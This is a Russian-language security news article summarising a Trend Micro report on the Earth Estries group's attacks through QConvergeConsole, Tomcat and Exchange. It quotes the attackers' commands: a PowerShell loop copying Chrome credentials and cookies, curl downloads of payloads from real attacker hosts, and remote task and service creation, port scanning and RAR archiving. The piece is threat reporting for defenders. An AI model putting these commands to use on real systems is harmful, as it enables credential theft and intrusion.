За кулисами изощренных кибератак на корпоративные сети.
Trend Micro подробно рассказала о двух масштабных хакерских кампаниях, запущенных группировкой Earth Estries. Злоумышленники применили продвинутые техники проникновения в корпоративные системы через уязвимости в широко распространенном программном обеспечении.
Первая схема атаки сфокусировалась на эксплуатации QConvergeConsole - инструмента для управления оптоволоконными адаптерами QLogic. После получения начального доступа хакеры использовали утилиты PsExec и WMIC для распространения вредоноса по сети.
Исследователи отмечают, что злоумышленники эксплуатировали уязвимости или некорректные настройки QConvergeConsole через установленный агент удаленного приложения (c:\program files\qlogic corporation\nqagent\netqlremote.exe), который позволял проводить сетевое сканирование и устанавливать Cobalt Strike на целевые машины.
В другом случае группировка использовала уязвимость в Apache Tomcat6, поставляемом с QConvergeConsole (c:\program files (x86)\qlogic corporation\qconvergeconsole\tomcat-x64\apache-tomcat-6.0.35\bin\tomcat6.exe), для бокового перемещения и управления инструментами поздних стадий атаки.
Группировка также активно применяла различные бэкдоры для закрепления в системе. Среди них - Cobalt Strike, Trillclient, Hemigate и новый образец под названием Crowdoor. Вредоносное ПО доставлялось на зараженные машины в виде CAB-архивов.
Особое внимание привлекает инструмент Trillclient, который похищал учетные данные из кэша браузеров. С его помощью злоумышленники получали дополнительный контроль над скомпрометированными системами. Earth Estries демонстрировали глубокое понимание инфраструктуры жертв - они напрямую скачивали документы из внутренних веб-хранилищ с помощью команды wget.
Trillclient запускал PowerShell-скрипт для сбора профилей пользователей:
foreach($win_user_path in $users_path){
echo D | xcopy \"C:\Users\$win_user_path\AppData\Roaming\Microsoft\Protect\" \"$copy_dest_path\$win_user_path\Protect\" /E /C /H;
attrib -a -s -r -h \"$copy_dest_path\$win_user_path\*\" /S /D;
echo F | xcopy \"C:\Users\$win_user_path\AppData\Local\Google\Chrome\User Data\Local State\" \"$copy_dest_path\$win_user_path\Local State\" /C;
echo F | xcopy \"C:\Users\$win_user_path\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies\" \"$copy_dest_path\$win_user_path\Default\Network\Cookies\" /C
echo F | xcopy \"C:\Users\$win_user_path\AppData\Local\Google\Chrome\User Data\Default\Login Data\" \"$copy_dest_path\$win_user_path\Default\Login Data\" /C;
}
Во второй схеме атаки хакеры эксплуатировали уязвимости в Microsoft Exchange. На серверы устанавливался веб-шелл ChinaCopper, через который злоумышленники разворачивали Cobalt Strike и другие инструменты для бокового перемещения по сети.
Ключевыми компонентами этой цепочки стали бэкдоры Zingdoor и SnappyBee (известный также как Deed RAT). Вредоносное ПО загружалось либо с управляющих серверов, либо через curl-запросы к подконтрольным хакерам сайтам. Типичные команды для загрузки инструментов выглядели так:
curl -o c:\windows\ime\imejp\VXTR hxxp://96[.]44[.]160[.]181/VXTR.txt
curl -k -o C:\programdata\UNBCL.dll hxxp://mail.ocac.org[.]pk/UNBCL.docx
curl -k -o C:\programdata\portscan.exe hxxp://mail.ocac.org[.]pk/Portscan.docx
В отличие от первой схемы, здесь основной акцент делался на эксплуатации Exchange и частом обновлении вредоносных программ для избежания обнаружения. Группировка активно использовала PortScan для картографирования сетей, а дополнительные бэкдоры помогали в сборе и экспорте документов через RAR-архивы.
Earth Estries уделяли особое внимание скрытному присутствию в сетях жертв. Они регулярно обновляли свои инструменты и заметали следы, удаляя старые версии вредоносного ПО. Длительное присутствие обеспечивалось различными кастомными бэкдорами, включая недавно обнаруженный Crowdoor, который взаимодействовал с Cobalt Strike.
Для закрепления в системе злоумышленники использовали различные методы создания задач по расписанию, в том числе удаленное создание через WMIC:
wmic /node:<IP> /user:<domain>\<user> /password:***** process call create "schtasks /run /tn microsoft\sihost"
Исследователи выявили несколько техник, применяемых группировкой. Помимо кражи учетных данных через Trillclient, хакеры маскировали командный трафик через локальные и удаленные прокси-серверы.
Для разведки сетевой инфраструктуры использовались PortScan и специальные скрипты. После скачивания утилиты PortScan злоумышленники проводили сканирование сети на наличие открытых портов 80, 443, 445 и 3389:
cmd.exe /c "C:\programdata\portscan.exe 172.xx.xx.0/24 445,3389,80,443"
cmd.exe /c "C:\programdata\portscan.exe 172.xx.xx.0/24 445,3389,80,443 >1.log"
Собранные данные упаковывались в зашифрованные RAR-архивы и выгружались через анонимные файлообменники. Примеры команд для сбора данных:
rar.exe a -m5 <install path>\his231.rar "C:\Users\<username>\AppData\Local\Google\Chrome\User Data\Default\History"
rar.exe a <install path>\0311.rar C:\users\<user name>\Desktop\* C:\users\<user name>\Downloads\* C:\users\<user name>\Documents\* -r -y -ta<cutoff date>
В ходе исследования были обнаружены дополнительные бэкдоры - FuxosDoor и Cryptmerlin. FuxosDoor работал как бэкдор для веб-сервера IIS, обеспечивая скрытую связь с командными серверами. Cryptmerlin использовал технику DLL sideloading для длительного контроля над зараженными машинами.
Zingdoor и SnappyBee функционировали как HTTP-бэкдоры, облегчая боковое перемещение по сети. SnappyBee представляет собой модульный бэкдор, считающийся преемником ShadowPad. Оба вредоноса использовали механизм DLL sideloading для внедрения в легитимные процессы.
Через веб-шелл ChinaChopper злоумышленники создавали удаленные службы для повышения привилегий и обеспечения персистентности:
sc \\{hostname} create VGAuthtools type= own start= auto binpath= "c:\windows\microsoft.net\Framework\v4.0.30319\Installutil.exe C:\Programdata\VMware\vmvssrv.exe"
Новый бэкдор Crowdoor, замеченный в первой цепочке атак, расширял возможности группировки по переустановке и обновлению Cobalt Strike на скомпрометированных системах. Он выполнял различные действия в зависимости от переданных аргументов, включая установку механизмов персистентности через реестр или службы.
Веб-шелл ChinaCopper, использованный во второй схеме, предоставлял удаленный контроль над зараженными серверами Exchange и служил плацдармом для дальнейшего проникновения в сеть.
Специалисты настоятельно рекомендуют организациям устранять уязвимости в сервисах, доступных извне, особенно в широко используемых приложениях вроде почтовых серверов и консолей управления.
Разбираем кейсы, делимся опытом, учимся на чужих ошибках